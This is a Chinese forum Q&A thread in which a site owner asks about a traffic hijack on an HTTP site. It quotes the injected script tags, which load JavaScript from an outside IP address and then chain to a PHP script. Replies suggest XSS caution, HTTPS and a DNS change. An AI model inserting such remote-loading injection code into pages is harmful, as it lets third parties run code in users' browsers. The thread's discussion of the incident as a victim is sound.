abeholder
V2EX  ›  问与答

这是什么劫持?有没有大佬进来看一下~

  •  
  •   abeholder · Sep 17, 2018 · 1694 views
    This topic created in 2882 days ago, the information mentioned may be changed or developed.
    自己用 vps 搭建了个网站,里面有些自己需要的爬虫数据和一些小玩意,没有上 https。
    遇到过很多次被运营商劫持插入了些 js 什么的,自己也没怎么在意。
    但刚刚发现被劫持插入的 js 代码如下:

    <script src="http://45.126.123.80:118/j.js?MAC=CC81XXXXXXXX"></script>

    点开之后里面是这样的

    document.writeln("<script src=\'http://45.126.123.80:118/t.php\'></script>");

    然后继续点开的 php 代码我也看不懂。我不明白的是,为什么他要这样绕一层。
    还有个我不明白的问题,他是怎么拿到我路由器的 MAC 地址的(我是通过楼下房东家的网络上网的,房东拉了根网线上来)。

    有没有大佬能指导下~~~ T T
    4 replies    2018-09-18 10:39:14 +08:00
    Fulcrum
        1
    Fulcrum  
       Sep 18, 2018 via Android
    小心是 XSS 攻击
    MOONYANYI
        2
    MOONYANYI  
       Sep 18, 2018 via Android   ❤️ 1
    还是上个 https 吧,反正现在免费的多
    abeholder
        3
    abeholder  
    OP
       Sep 18, 2018
    @Fulcrum 静态网站~~
    MOONYANYI
        4
    MOONYANYI  
       Sep 18, 2018
    @abeholder #3 另外也可以顺便改下 DNS 节点
    About   ·   Help   ·   Advertise   ·   Blog   ·   API   ·   FAQ   ·   Solana   ·   2822 Online   Highest 6679   ·     Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.5 · 252ms · UTC 03:49 · PVG 11:49 · LAX 20:49 · JFK 23:49
    ♥ Do have faith in what you're doing.